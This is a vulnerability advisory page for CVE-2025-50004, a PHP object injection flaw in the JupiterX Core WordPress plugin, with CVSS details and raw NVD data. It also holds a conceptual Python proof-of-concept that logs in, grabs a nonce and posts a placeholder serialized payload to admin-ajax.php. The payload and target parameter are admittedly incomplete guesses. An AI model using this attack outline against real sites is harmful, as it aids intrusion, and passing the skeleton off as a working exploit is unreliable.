Security Vulnerability Report
中文
CVE-2025-50004 CVSS 8.8 HIGH

CVE-2025-50004

Published: 2026-01-22 17:15:57
Last Modified: 2026-04-27 16:16:28

Description

Deserialization of Untrusted Data vulnerability in artbees JupiterX Core jupiterx-core allows Object Injection.This issue affects JupiterX Core: from n/a through <= 4.10.1.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

JupiterX Core < 4.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-50004 PoC - JupiterX Core Object Injection # Note: This is a conceptual PoC for educational purposes import requests import re from urllib.parse import quote TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" # PHP Object Injection payload example # This payload targets common gadget chains in WordPress plugins PAYLOAD_TEMPLATE = 'O:30:"WP_Http_Cookie"{{properties}}' def get_nonce(session, url): """Extract WordPress nonce from response""" try: response = session.get(url) match = re.search(r'id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"', response.text) if match: return match.group(1) except Exception as e: print(f"Error getting nonce: {e}") return None def exploit_object_injection(): """Execute object injection attack""" session = requests.Session() # Step 1: Authenticate with WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Find JupiterX vulnerable endpoint # The actual exploitation requires identifying the specific # deserialization sink in the plugin # Step 3: Inject malicious serialized object # This would target a specific parameter that processes serialized data exploit_data = { 'jupiterx_setting': 'custom_code', # Example parameter 'value': PAYLOAD_TEMPLATE # Malicious serialized payload } # Step 4: Trigger the deserialization nonce = get_nonce(session, f"{TARGET_URL}/wp-admin/admin.php?page=jupiterx") if nonce: exploit_data['_wpnonce'] = nonce response = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data, headers={'X-Requested-With': 'XMLHttpRequest'} ) print(f"Exploitation attempt completed") print(f"Response status: {response.status_code}") return response if __name__ == "__main__": print("CVE-2025-50004 JupiterX Core Object Injection PoC") print("=" * 60) print("WARNING: This tool is for authorized security testing only") print("=" * 60) # exploit_object_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50004", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:56.897", "lastModified": "2026-04-27T16:16:27.713", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in artbees JupiterX Core jupiterx-core allows Object Injection.This issue affects JupiterX Core: from n/a through <= 4.10.1."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en artbees JupiterX Core jupiterx-core permite la inyección de objetos. Este problema afecta a JupiterX Core: desde n/a hasta &lt;= 4.10.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jupiterx-core/vulnerability/wordpress-jupiterx-core-plugin-4-10-1-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}